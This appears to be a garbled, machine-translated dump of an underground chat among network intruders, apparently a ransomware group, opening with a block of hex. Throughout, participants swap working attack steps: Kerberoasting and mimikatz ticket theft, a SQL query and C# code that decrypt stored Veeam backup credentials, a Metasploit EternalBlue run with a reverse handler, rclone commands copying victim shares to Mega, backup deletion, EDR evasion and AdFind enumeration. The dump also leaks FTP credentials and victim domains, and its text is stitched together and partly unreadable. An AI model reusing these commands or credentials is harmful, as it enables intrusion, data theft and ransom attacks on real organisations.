                             6C0777ACBED5F7DC436E4E52CD0F8ACDD27B9A0F3BC0F48561B90062B8CA35B9F29D03554B63C9A3
                             3557792A86B3C89CE17E4D19AED61CC03E8B529A1DEE1126C5B8134F783A2854D2D31DA48617AF5D
                             7CB2D83B103B7501DD4DFFD6218D1FE59E94A79C2F370A2E2E3A5E71F1CC39F04EDD3EB236406E45
                             2672066377706BAB7835E5EAAAEB09A1DAC8A00A5EBD1D0CDE1675D487669C1F1604A70D4EC5DFA6
                             E851ACADB89B83E66503A846028BAFAC0C22AB8186961B0778990CCAC9F2CA5144575DEC274FE4BF
                             987CFF98041185AC931E6004316796DEDCFE212CCBB26EFA760504315DBBA225557C4DA69578C727
                             483A10EAB960FD994FD55B1AC1D75B926200778278FB9CD4EBF6D80F428B26FC97042B0FE39DC566
                             BF3F0FD55287C36671014BFDDE03AC60746788C3790C68D1CD056DA4BCE4D9CF8BF3FA0E1154ADEF
                             EBEEE3F8C15736C690D07BCBD9ABC837BA54C80C3EB388DC3609F0B31DA2C0AD041ED576239705F2
                             CCBA3D56F584C6A1200085F0ED6A7CE06A628EE8CE19D45356B2F3C7AC2C77FBF89CE64A8EA776DB
                             987B712E827A7580CAFF1442A06122A889EC3DF7AA7D00F1E2F1BBCA3E4E6ED03EB312915CDF11fuck it gives me a [ez vyt tuj dslftn I do not understand if there is no ticket ѕq51B↩lussee what stage you have a hitch? 1) you request tickets
2) you unload them from memory to disk
3) you brute force
4) PROFITchel, I don't get it. I used empire and psh invoke to give out kerberoast where did you "get it"? and where do you see it if you say it's not in memory?it's a MSSQL account on some server, there's no such ticket from this user, it's not a hashfuck I wrote, I did a kerberoast and got the hash of the domain user : $krb5tgs$23$sqluser$site.site.no$MSSQLSvc/sitefil1.site.site.no:1433tralya I have a hash from admin, but they are from the current username. Yes, these tickets you have two options, either you're smoking a match on kerberos and on the attack kerberoastin, or stupid you learn commands in mimic then you unload from memory to diskthat you have tickets were not only the current user you first need to ask them when you throw tickets to the brute force, he takes the dictionary, converts the password into AES-256 and tries to decrypt, where decrypted - bingo> KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
this isn't a hash, it's a ticket: $krb5tgs$23$*sqluser$site.site.no$MSSQLSvc/sitefil1.site.site.no:1433*

Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:{Windows\system32>klist

Current LogonId is 0:0x5d20442

Cached Tickets: (9)

#0> Client: web @ site.site.NO
        Server: krbtgt/site.site.NO @ site.site.NO
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x60a10000 -> forwardable forwardable renewable pre_authentic n
ame_canonicalize
        Start Time: 11/3/2020 14:41:29 (local)
        End Time: 11/4/2020 0:41:26 (local)
        Renew Time: 11/10/2020 14:41:26 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x2 -> DELEGATION
        Kdc Called: sitefil2.site.site.no

#1> Client: web @ site.site.NO
        Server: krbtgt/site.site.NO @ site.site.NO
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authenticating nam
e_canonicalize
        Start Time: 11/3/2020 14:41:26 (local)
        End Time: 11/4/2020 0:41:26 (local)
        Renew Time: 11/10/2020 14:41:26 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called: sitefil2.site.site.no

#2> Client: web @ site.site.NO
        Server: MSSQLSvc/sitefil2.site.site.no:1433 @ site.site.NO
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_deleg
ate name_canonicalize
        Start Time: 11/3/2020 15:43:35 (local)
        End Time: 11/4/2020 0:41:26 (local)
        Renew Time: 11/10/2020 14:41:26 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called:

#3> Client: web @ site.site.NO
        Server: WSMAN/sitefil1.site.site.no @ site.site.NO
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_deleg
ate name_canonicalize
        Start Time: 11/3/2020 14:59:41 (local)
        End Time: 11/4/2020 0:41:26 (local)
        Renew Time: 11/10/2020 14:41:26 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called: sitefil2.site.site.no

#4> Client: web @ site.site.NO
        Server: cifs/sitefil2.site.site.no @ site.site.NO
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_deleg
ate name_canonicalize
        Start Time: 11/3/2020 14:41:39 (local)
        End Time: 11/4/2020 0:41:26 (local)
        Renew Time: 11/10/2020 14:41:26 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called: sitefil2.site.site.no

#5> Client: web @ site.site.NO
        Server: ldap/sitefil2.site.site.no @ site.site.NO
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_deleg
ate name_canonicalize
        Start Time: 11/3/2020 14:41:29 (local)
        End Time: 11/4/2020 0:41:26 (local)
        Renew Time: 11/10/2020 14:41:26 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called: sitefil2.site.site.no

#6> Client: web @ site.site.NO
        Server: cifs/sitefil1.site.site.no @ site.site.NO
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_deleg
ate name_canonicalize
        Start Time: 11/3/2020 14:41:29 (local)
        End Time: 11/4/2020 0:41:26 (local)
        Renew Time: 11/10/2020 14:41:26 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called: sitefil2.site.site.no

#7> Client: web @ site.site.NO
        Server: ldap/sitefil2.site.no/site.site.no @ site.KUMER
A.NO
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_deleg
ate name_canonicalize
        Start Time: 11/3/2020 14:41:28 (local)
        End Time: 11/4/2020 0:41:26 (local)
        Renew Time: 11/10/2020 14:41:26 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called: sitefil2.site.site.no

#8> Client: web @ site.site.NO
        Server: LDAP/sitefil1.site.no/site.site.no @ site.KUMER
A.NO
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_deleg
ate name_canonicalize
        Start Time: 11/3/2020 14:41:28 (local)
        End Time: 11/4/2020 0:41:26 (local)
        Renew Time: 11/10/2020 14:41:26 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called: sitefil2.site.site.no

C:\Windows\system32>and the ticket list gives the current user's tickets, I made a kerberoast and got the hash of domain user : $krb5tgs$23$*sqluser$site.site.no$MSSQLSvc/sitefil1.site.site.no:1433*tralalyada not understand a fuck if you for example climbed on the host, where the domain token admin hangs you can steal it and go on with it if I understand your question correctly you can and PTT can not do with this ticket? without an account? sandki) aaaa do itpwd
either on the server in the cob or on the client wherepwd where did it save it didmimikatz kerberos::list /export (the article says it all) klist7 tickets in memory like how to see it? is it in memory? how, I can not export it but the principle is the same
you can export a ticket to memory and get the same .kirby.on the seclab there's a manual how to build a Kirby agartt it's when you already have a pass from the domain admin or other privileged accountpassas ze ticket is a little different http://mediumcom/@t0pazg3m/pass-the-ticket-ptt-attack-in-mimikatz-and-a-gotcha-96a5805e257aepretty I gave above 2 links) there is a manual how to do itexport the ticket from memory to diskkak receiving kirbi ?the complexity of the brute force (any) depends on the hash algorithm, the password policy and your brute force capability, if you mean it i missed the point, it's all about ntlmtalking about kerberos hash netbilet - it has an extension .kirbyholdhttp://www.securitylab.ru/analytics/496049.phphttps://ru.wikipedia.org/wiki/Kerberos#%D0%9F%D1%80%D0%B8%D0%BD%D1%86%D0%B8%D0%BF_%D1%80%D0%B0%D0%B1%D0%BE%D1%82%D1%8Bhttps://hashcat.net/wiki/doku.php?id=example_hashes
7500 Kerberos 5 AS-REQ Pre-Auth etype 23 $krb5pa$23$user$realm$salt$4e751db65422b2117f7eac7b721932dc8aa0d9966785ecd958f971f622bf5c42dc0c70b532363138363136313233383835
not hash is yes ))) if it is a ticket then how to make .kirbi if it is a ticket and not hash) and then what can be done with this pass, and the ticket? and if it is a ticket then how to make .kirbytam in addition to the service accounts there are also ordinary users, well, there as luck krchto difficulty brute-force ticket depends on what password is on the service account, it may be a generic, or password1 and it's not called "kerberos hash", you brute-force tickets depending on which spn you brute-force, how do you tell13100 Kerberos 5 TGS-REP etype 23 $krb5tgs$23$*user$realm$test/spn*$passes are usually complex or not?but kerberos hashes, it is similar to ntlm2 if there are a bunch of them and simple polzakov then brute-force quite - usually polzakoviki easy passwords put, the admins have more complex than relay and brute-force do not do anything brute-force hardNTLMv2 relay.kirbi not make with him with hash? logged in somewhere and if not brute force it does not apply in any way more yes?[ ](https://stylebrooks.com/group/discussion?msg=yy3FBeoLNKGRZBpze) this is a network hash. it is possible to brute-force hash I mean, if there is hash NTLMv2 with it there is nothing to do except brute-force? you can collect through user's PID. who knows how to use kerberoast hash in the system context?
edr_quey install the pluginSave who has the process name - the names of all major av2 commands from the system and rdp off this fuckin@Shved finally found how to bypass Duo Security
``https://help.duo.com/s/article/1088?language=en_US
``@Air pour the date here
into the generalinsulation.com folder
and let me know how it's done
```
172.82.162.66
admin
3cT26dDrDCwS
ftp 21 port
``but you will write @twinbtsxjckg5tgag3via6wi7irpywl6w2fh66pmwt6zlbf5vlyyvnjjxcad.onion
vampir
BYI245Y52NCndjjYRhRmZaologize and write twinook now I'll give you a new account, we have not a big reorganization Greetings, has anyone run into a Cortex XDR? Some kind of monitoring, like av, blocks everything, any activity on the network. Can bring it down can be how that, cuts down even the white software to close processes. Manually kill the system does not work. Clean dll, exe, psh does not let the rest of it.
if you're paranoid
```
= )there speed is even worse)if paranoid - there is i2p plus considering the fact that the control of a huge number of NODs for the NSA... otherwise in the lagging I don't use torus I don't know what the fuck is the point of installing torus on the output?
after that the speed will not be more than 5mb better the opposite
you can mix and match your purchase - and then your[ ](http://wfy76wigkpoxqbe6.onion/group/discussion?msg=y5tx4nRP8mYKGp7Zb), for example, the input will be your own VPN, and the output will be purchased, the output will be torrent, so it will be harder to find even just your VPN, aypy and of course never sit from home internet and only a modem, + change the whole chain every month and / or after a large payment I'm interested in your opinion)
I saw an article on various vpn, including when you raise your own vpn or buy from some company. So, discussed the investigation of the various structures and the search for a man using a VPN from any fee office, the structure may apply to this office to provide a VPN (which allegedly does not see the log), to pay her or under some other pretext to get your ip connection.  Discussed the same creation of its VPN, but the question is, when we raise your VPN, we also take a service that prevents the same structures find out from which service the IP VPN and do the same thing as a paid office that provides a VPN service?) + has already suggested) tupunulbladhoundParni! Hi all! What are the alternatives to UserHunter? Ways to accurately pierce the admin's PC? uH do not help if you delete instance with backups no nu again about asurbackups, if you delete them from the cloud, will they restore or not in the very first in which folder in viam can see jobes))= )pbs)ur welcomehttps://www.vishalon.net/blog/commands-for-using-standalone-7-zip-to-split-and-combine-zip-fileкак make it through a goo understandable, and how to do and can you with 7za console also interested in or if you know how you can archive a folder, say, that when archiving the archive beat into parts by 1gb for example?it would be more convenient to give a number of say, the first 20, then the next and so on and so on. would it work with 7z.exe? just give an example how to archive the first 20 files from the folderbro, how to archive all the folders I know. i am interested in the exact moment of flags, etc. how do i record it correctly? Can anyone suggest how to carefully archive files from the folder in Bicon, but not all, and selectively. say the first 20, then the next, etc., or say based on the weight or letter which begins with the files in the folder. alright, fuck them, the other will switch to a palevnoe, but there as luck would be) Well, small a lot of disk will be loaded, lags ... another thing, if he wants to download some of the files, the speed is also not great there are small files, just their much think lagged strongly will ? )so he has work it locate will start, the network will take a discriminating, please advise whether it will be palevoe to raise a VPN to the bot, climb into the right folder through Explorer and download the files from there, provided that this occurs during working hours ?
i can see all the files in the datastores and do whatever you want, located directly in the panel vime -> fileso, by gut instinct i found it, maybe you need a root pass more enter or in this spirit i can not see how to google, i agree with you, i can't see how i can google it, i agree with you. it should be possible but you also need to delete it because veeamzip is a utility. in short, you can zip it to an archive with a password right through vimeam lolno i'm going to check with the console. it's not a snapshot, it's a replication of veeam exagrid but it uses one fuckin' thing, i've uploaded it above. i think i have this script, i made it up) just doubt that it will give anything, although you can try just erase it is unlikely option, and how to archive i actually do not remember it does not really matter even how we pull the access, i do not know what to do then with these replications on the addyndun i also think so, so i have to fuck my brain with vimopo dns resolves ipi and that's it, reqest timeouts with dk and try to either offe or for farmerd, but the problem is that tech hosts are not available or parser of event logs with cd>what is the script that at dc looks when and in what pc was logged into the username?
userhantere looked it up, there are really creeds like root ****** by https esxi> and you have a wiiim connects to this storage to back it up or to put a backup there?
there's a script that looks up when and on what pc the user was logged in? i also have a question, what to do with these replicas
i remember when i was there, i packed it in an archive with a password, but i can't even fucking sneak the 7z in there, i don't remember how we archived the whole castrated linux thing, all right there's hardware like dell poweredge and there's a raid disk array connected to it, did the servers themselves get into esxi through cc?maybe i won't have to fuck around. you led me to believe that it makes sense to check the domain authorization on the esxi hypervisor i didn't go into the hypervisor. i think so, but i'm more worried about storage. i think it just has a root account in the vim though i will check about the root in gooytes, maybe i fucked up there are also virtual hard drives, replication is flying to esxi storage
the credentials for connecting to it says root ********much i need them you mean there should be root passes to hypervisors too? maybe someone has been in the database and knows where something is there
SELECT TOP (1000) [id],[user_name],[password],[usn],[description],[visible],[change_time_utc]FROM [VeeamBackup].[dbo].[Credentials];
```
this line should be changed, because the credentials for the storages are obviously not there ```.
tasklist /v
netstat -ano
Look for MsSQL port by PID in 2 outputs
find where sqlcmd.exe is located
"c:\Program Files\Microsoft SQL Server\110\Tools\Binn\sqlcmd.exe" -S localhost,found_port -E -y0 -Q "SELECT TOP (1000) [id],[user_name],[password],[usn],[description],[visible],[change_time_utc]FROM [VeeamBackup].[dbo].[Credentials];"

option -y0 is mandatory otherwise sqlcmd cuts the output

Then you take this code

using System;
using System.Collections.Generic;
using System.Security.Cryptography;
using System.Text;

namespace Main
{
internal static class Program
	{
	private static void Decrypt(string b,string a){
		if (string.IsNullOrEmpty(a))
		{
			return;
		}
		byte[] encryptedData = Convert.FromBase64String(a);
		Console.WriteLine(b+':'+Encoding.UTF8.GetString(ProtectedData.Unprotect(encryptedData, null, DataProtectionScope.LocalMachine));
		return;
	}
	private static void Main(string[] args)
		{
			Decrypt("optional username", "here is the hash from the sqlcmd output");
		}
 }
}

a separate Decrypt function call for each hash

You type c:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe veeam.cs

you drop the exe on the server with the veeam and run it
I have a mini-manual here, but I'm not sure if it will work on the storages specifically to the storages and not to the vim panel itself. who had a chance to rip the hypervisor/storages codes out of vim? i remember? https://github.com/tnpitsecurity/ligolo-ng

Tunneling, better than socks, uses tun interface! what is kana? in the kana which you addedprilovet I'll raschbiruyutsya that network without delavsya hello thereperesnimi it tomorrow look at?? scanner to look for cars all hello.
Perhaps the topic was raised, if someone has solved it - write in person, please.
When connecting to Fortica in `ipconfig /all ` gives google DNS records.
Next is not clear how to scan the grid, what would at least somewhere to get through.The keylogger esxi was sent for fixing, do not use it yet, there is one bottleneck where it can get in the way{"$binary":"8kWjqI0y8R+MNt/Kub61wAPryhMSHUtb9U5HZdyStO1UZFZugftryBYpesOxjRkSHkIpKUfUQ3iZ8Y6PgUMTyD3Pd69Fwo6HuYH0uK2WT5eHdm0Ru8pyrkCPDWs3/WyZRviJGj6MaEHpvu4MqaPipVv8nIczyt2qjBZQY/W/4DkaAmvdGdLlmDQl2V7al69LkGfR6nZrELn0K1CrLtzHO5ubVeLPCR1HzXIUj6qfqSy8D9jL"}{"$binary":"qlY9Yy/uKCOjgjFaDHegKKYKuWCtCV5e4xxcN73o9Y3T1EeAbrKGJELVsZncMlxqppiOlLXDIsWILbkknTxKzZKx6fgducw1SagGWekXyIHQRMk9viX7pzOASl31nvLdTcIF0f6hBro8EF4EL08nY4D/+Jz0INaiE54PZ9s+TcmUpeXxHf6CDZGjoX+ZpIBgqRANdMydjWhAgYEqfvaI1"}{"$binary""xPACqYgFfTMW286bcFZjKwwFOzc9DMCuywe1mtRataDIZEf6cI2BsEX6eClML8xkzpgVRsx5o1bg7wBrz9VtvrAz2RPRjwPpZ1N8ijcGR/idLDAUpsv6EPHjJMKt4CdWZcriyFj1d9nqz/yQOTZ7sp4F/8W3nzqy1mIzTaecw+z247sVv3mQTDb7QSVahenetbKpXtM9QYaEgav1Bih9LlsVZhUqAuTggtZMs9t4FQ=="}{"$binary":"LrqENVpIrVsphbKn+Qnm6ZoLgeO0/VgmGzo1QrHjJeFnlHlUNHWfxozW3m9uRGVSHnYH1wZKqV7yMg9/uVC/XqUGaF3zgdIKJpi5gvsQ0VNS5wmwjG/TsiJSrA8AKMyiiaAMivi5oZGtYecTKOFGh7h+F2M+cyKsGRy0l8uHs0SfAOkvID0vPmR9zbFdOez9L1+P6FHWsCVh+JoYyQ2aBV6rWn0CM7uzHY1t0HNU0A=="}приветуведомления with text text appears in the chat, and the chat does not show shit and is displayed as unreadCheck for connectionTo do a profile search for wusaRemind me please, how to fix it in cobalt?```
[-] could not spawn C:\Windows\system32\wusa.exe: 740
``like redirecting from local to domain, try domainnextcreditsmaybe someone has encountered this issue...
need to remotely enable port 3389 RDP on the LA (local admin)guys who encountered such a message? what is it in general and how to bypass@all d-box.com - whose fortik
@all groupemontoni.com - whose fort?

I repeat! execute-assemblyhttps://github.com/nccgroup/nccfsas/tree/main/Tools/SharpZeroLogonвсем hello, does anyone have instructions on zerologon and proxilogon? who has encountered this error?
```
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 5.199.174.223:4444
[-] 172.31.30.188:445 - Exploit aborted due to failure: unknown: Cannot reliably check exploitability. Enable ForceExploit to override check result.
This is the first time I've had such a mess and problems ¯\\(ツ)_/¯or for example the 3rd issue, we have two hosts, one of which was mentioned above and everything runs fine, let it be host1 and host2 where remote commands can not go through and only go through rip and let it go through the console
 For example, let's take a batcher on host2 . So when I go to rndp on host2 and trying to edit / change the text batch or just delete it he writes that I do not have the right to do it (batch file is in the classic programdata) but if I go to host1 and in the file browser to go to \host2\C$\programdata then easily I can delete that batch or copy a new one from host1 did not say the wrong session, I meant the logged in user on the host,  about rdp - as an option, try to migrate to the system process, so you after logging off the session did not fall off it is either a bug or a feature) ` `.
>When trying to execute commands remotely under this account (tried psexec and wmic) gives out "accesses denide" but going by rndp and starting the same batnick, for example, everything is started normally.
```
I also met this once, what is it, I do not know, but most likely in the settings ADGod need advice. What can it be ?
The symptoms :
 1oe There is an account YES which normally goes everywhere. When trying to execute commands remotely under this account (tried psexec and wmic) gives out "accesses denide" but going by rdp and starting the same batnik for example, everything is started normally.

2o There is a session from this user on one of the hosts where everything works fine when you connect to other hosts by rdp (tried 5-7 hosts) and close the window rdp session, the account is unlogged. Roughly speaking, I can not let the process and close the RDP window, the process will be executed only when the active RDP session.
While on the same host as I pointed out above is not observed.
What can it be?  Some tricky settings in the GPO? Why on hrdp I can execute commands and remotely remotely does not work,
On one host the account works fine and closing the RDP window the processes work and on other hosts there is a "logout"
 
PS Maybe some kind of glitch? I could not in the beginning randomly out of 100+ hosts to choose exactly the one on which all works well do not see#1.done.ohiodominican.eduNashee have access to soks? luks hangloloyalnoda like on injekt it more lesses bitdefender lsass who removed? or how to inject\style the process polozak? have a clipboard grabber? share plz @all groupemontoni.com - whose fortik? @all d-box.com - whose fortiks diskinventory this must be removed from the list but left on the hard
and remove from the drive it from the hardavo you see there from the inventory and from the drive, from the drive as I understand it should? not done in a long time) @all just in farnese, better ask again) who online, remind pliz to completely remove the backup, which button to press, from the inventory or drive (I assume that the drive) spsklient? have anyone who have faced, tell me, RedCloack AV to mimic sizzles?
gentlemen
if someone says so - write to PM
Alexandar Yerminov, aka veger in lss) or those who are there for backup in fact do you try just rdp to go to the server, viam, open the console and enter the creds domain admins?
Guys who found the central server viama (to decrypt), through the proxy server viama, removed the task list of each server, went to all servers that have the process viama
1. the server on which the viam console, runs viam services but does not spin skl server
2. on the servers where both you services and sqlservr.exe are running - no port detected by the PID of sqlservr.exe process
help who faced the problem is anyone online?
need help when working with Іssass thanks)[ ](https://stylebrooks.com/group/general?msg=aLPhGWXPWcNHtJ2g4) it pulls SharpChromium from the guitar, collects all chrome browsers[ ](https://stylebrooks.com/group/general?msg=aLPhGWXPWcNHtJ2g4) there was some sna script from the chinese. pulled it like. from polzak context switch someone pulled passes from microsoft edge via mimic? what command to pull? thanks) take 2 Ubuntu 18.04, watch this video and configure) ``https://www.youtube.com/watch?v=lT1dhfRKPwo
Ubuntu 18.04 !!!``and never been banned,I just googled for this purpose which accepts bits and does not ban for lifting the vpn hello all,advise a good hoster to lift the vpn on the server,thanks in advance)``
Ns5WQ4hUEqxZRO4Ls1WW8wn8K95FKrkEKLxyjXjdwmjb0NpLosviDzW1N1arhNiY
```
look, whose is it? does anyone have a script or a program you can advise? or what kind of logs are you going to clean?
detective it build? has anyone encountered ? put openvpn by script on debian, when connecting client gives error: ``.
2021-08-17 15:49:18 Insufficient key material or header text not found in file '[[INLINE]]'' (0/128/256 bytes found/min/max)
2021-08-17 15:49:18 Exiting due to fatal error
``[ ](https://stylebrooks.com/group/general?msg=uCCqMeZ3oTQAbJX9F) @Tyr@all beep who worked with hashtag, dictionaries. need a little advice, skype sites where you can watch Asian companies rhubarb... On zuminfo almost no one from Asiahttp://github.com/21y4d/nmapAutomatorNew 0-day ;) Better ideas nakidite che present :) Ladies, if any of us, congratulations on the holiday! :) I have not tried it myself) write me back as you turn out please Thank you I'll try everything I understand.
Export-PowerViewCSV - thread-safe CSV append
``````
Export-PowerViewCSV - thread-safe CSV append
Resolve-IPAddress - resolves a hostname to an IP
ConvertTo-SID - converts a given user/group name to a security identifier (SID)
Convert-ADName - converts object names between a variety of formats
ConvertFrom-UACValue - converts a UAC int value to human readable form
Add-RemoteConnection - pseudo "mounts" a connection to a remote path using the specified credential object
Remove-RemoteConnection - destroys a connection created by New-RemoteConnection
Invoke-UserImpersonation - creates a new "runas /netonly" type logon and impersonates the token
Invoke-RevertToSelf - reverts any token impersonation
Get-DomainSPNTicket - request the kerberos ticket for a specified service principal name (SPN)
Invoke-Kerberoast - requests service tickets for kerberoast-able accounts and returns extracted ticket hashes
Get-PathAcl - get the ACLs for a local/remote file path with optional group recursion
``misc functionshttps://academy.hackthebox.eu/course/preview/active-directory-powerview/powerviewsharpview-overview--usage[ ](https://stylebrooks.com/group/discussion?msg=GeticYLfEDdD5Wiz5) this is how? I understand that it's not difficult just somehow never had a chance to get the log from there in a couple of minuteswhy? it's very simple try a miscomany never tried but I will have somewhere in the log you need the root from the server with the cobalt do not know
you can get the log output from sftp in a couple of minutes? and in the console? no way? you can get the log output from sftp baconGod there is a trivial question how to display the result of the command in a txt file when you execute the execute-assembly
The command itself `execute-assembly /root/Desktop/Webwork/SharpView.exe Get-DomainComputer | Get-NetLoggedon `
I tried `execute-assembly /root/Desktop/Webwork/SharpView.exe Get-DomainComputer | Get-NetLoggedon >> C:\file.txt
                            `execute-assembly /root/Desktop/Webwork/SharpView.exe Get-DomainComputer | Get-NetLoggedon | Out-File -FilePath C:\file.txt -append -force -encoding UTF8`Hmm, not helpful.Got it, thanks, @slice!
@t3chnolog question on your manu with NTDS, tried `Esentutl /p C:\log\ntds.dit` to fix the ntds file, but requests a certain ntdsai.dll, where to get it and where to put? have an interesting and important questionBarracuda Backup Server 490 - but specifically with these gearsanyone has experience with barracuda backups?
anyone got any domain registrar logs sellers?
i have a synology nas in my case. is there a google drive cloud sync enabled, what are the deletion options ? and does google restore deleted drive files ? @all can someone pass the session from a x64 car ? @all friends who are there free and without tasks, beep me in pm not a bet)toulouse by the way is handy)))) and not cna at all, does not integrate directly with coba is it a script ?) https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
you mean this script?)hello everyone, who knows a cna script with these arguments?
>psexec [hostname] [share] [listener]@all write to anyone who needs a session to redo, right in the workplace on this case where you need a freshThe question as above advised through ftp server on the dedicates, filezilla put 5 minutes, then through the clone pull, very surprised speed, 46 gb for an hour and a half did[ ] (https://stylebrooks.com/group/general?msg=5KZsucuYmrv24D8TX) found a version of this. if relevant scribble
5-10mbps really.
onyon back repurposed kekhoroshy analogue) I just rented a server at 32tb and there I download by ftpstalked that the case is limited to the use of mega, there are still some good analogues, preferably with btk payment ?yes, it will take some time to weigh all the same, won't it ?well thank you and that's it) you can somehow use wmik, the syntax would be correct da well, it's too long...see in the last line of the outaptu ``dir /s E:\YouDocs > log.txt
``How do I check the size of a certain folder?
dnscmd /enumzones > AllZones.txt
for /f %a in (AllZones.txt) do dnscmd /ZoneExport %a %a.txt
` `remember плиз command poll DnS with dk@all who needs 2fa to take over the sonics? now really do if the log will not be then try the user to write it, from whom you start vmikflag -P plug in and add at the end >> C:\stat.logI was just interested in the statistics.
In any case, thank you.@lexman wait, but it's just start and check, without the ability to periodically see the statistics of the upload, as with the flag `-P`, right? I will add, before starting check that the system rights on the remote machine was enough to go to a given diRight, thanks.
The variant with wmic is also interesting, @lexmandaThe whole output will go into session, yes? `shell rclone.exe copy "\\host\F$" mega:/ -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12 -P `all output into session. flag `-P `you use and all or ` --progress `thank you! Yes I will explain in detail, please, or give example?
Perhaps others will also be useful.rklon command put in the baton, run through wmic
it worksGod, is there any way to run rclone from bacon, and then periodically check the progress? https://www1.appliedsystems.com/en-us/resources/videos/applied-csr24/https://portal.csr24.com/ - has anyone come across? stewart can fill a bunch at once a free service for cracking hasheshttp://crackstation.net/sends backups to the cloud, in the account is a pass, but is there an option to get it? as in viamStorageCraft who decrypted the cracks?
SHUT UP AND TAKE ME FULL INFO!111 and 50 rows by 50 rows to query the tablesto watch the database then dump the clere pass will query all the msl servakina based noSpaaahohoro we need the combine to roll up not the fact that there is a webapp, or separately look for this webapp not climesf dump hashioni lie in clereveb the appa "writes" in the base in config[ ](https://stylebrooks.com/group/general?msg=eJuSrgKkk8W7Yumcy) hmmm
well if it's on gitecac i've already said it's a tricky way to do it
more options? yes, where is the target process on the DB server? where are the creeds? msf can dump sa creeds, i think there is a similar solution on the gitaskl management studio involves opening an rd on which you can palp
cobalt session - to catch a detec-tionadoado the easiest and safest option that do not palnutsya usually these crosses are in the configuration of web applications want to pump the manual can and not only her pollingI ask why is it MsSql admin account is of course she has a crosses or what is where as the account is where to get it?so stopsqlcmd under the VPN)hhm on a remote hosta from under the VPN saysqlcmd under the account saaWhat options for polling the database has except
SQL Management Studio
hoisting the session and injection in sqlservr ?@all those without cases - in pm+@all attention everyone, who needs to reset the session SonicWall need to work with today directly - write to the PM thank you I will try it thank youhttp://habr.com/ru/post/441166/
https://www.ise.io/casestudies/password-manager-hacking/кто can do something with the 1Password database?
foreach($line in Get-Content .\file.txt) {
    if($line -match $regex){
        # Work here
    }
}
``in the loop, for examplepowershell Get-WmiObject -Class win32_logicalDisk `-ComputerName IP ` | ft DeviceID, @{Name="Free Disk Space (GB)";e={$_.FreeSpace /1GB}}, @{Name="Total Disk Size (GB)";e={$_.Size /1GB}} -AutoSize
Can someone tell me how to specify the ip address file correctly, so I don't have to type them separated by commas?
tried : `(Get-Content C:\programdata\list.txt)` but it says it's wrong argument
output:
```
#< CLIXML
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"><S S="Error">Get-WmiObject : Cannot validate argument on parameter 'ComputerName'. The argum_x000D__x000A_</S><S S="Error">ent is null or empty. Provide an argument that is not null or empty, and then t_x000D__x000A_</S><S S="Error">ry the command again._x000D__x000A_</S><S S="Error">At line:1 char:54_x000D__x000A_</S><S S="Error">+ Get-WmiObject -Class win32_logicaldisk -ComputerName (Get-Content c:\programd_x000D__x000A_</S><S S="Error">ata ..._x000D__x000A_</S><S S="Error">+ ~~~~~~~~~~~~~~~~~~~~~~~~_x000D__x000A_</S><S S="Error">~~~_x000D__x000A_</S><S S="Error"> + CategoryInfo : InvalidData: (:) [Get-WmiObject], ParameterBindi _x000D__x000A_</S><S S="Error"> ngValidationException_x000D__x000A_</S><S S="Error"> + FullyQualifiedErrorId : ParameterArgumentValidationError,Microsoft.Power _x000D__x000A_</S><S S="Error"> Shell.Commands.GetWmiObjectCommand_x000D__x000A_</S><S S="Error"> _x000D__x000A_</S></Objs>
``[ ](https://stylebrooks.com/group/general?msg=S6Z34gLYgcgAwB5Hx) anyone rolled ? let me play :)thxxm ``
adfind.exe -b dc=domain,dc=local -f "(objectcategory=person)" > C:\Programdata\ad\domain\ad_users.txt
adfind.exe -b dc=domain,dc=local -f "objectcategory=computer" > C:\Programdata\ad\domain\ad_computers.txt
adfind.exe -b dc=domain,dc=local -f "(objectcategory=organizationalUnit)" > C:\Programdata\ad\domain\ad_ous.txt
adfind.exe -b dc=domain,dc=local -subnets -f (objectCategory=subnet)> C:\Programdata\ad\domain\subnets.txt
adfind.exe -b dc=domain,dc=local -f "(objectcategory=group)" > C:\Programdata\ad\domain\ad_group.txt
adfind.exe -b dc=domain,dc=local -gcb -sc trustdmp > C:\Programdata\ad\domain\trustdmp.txt
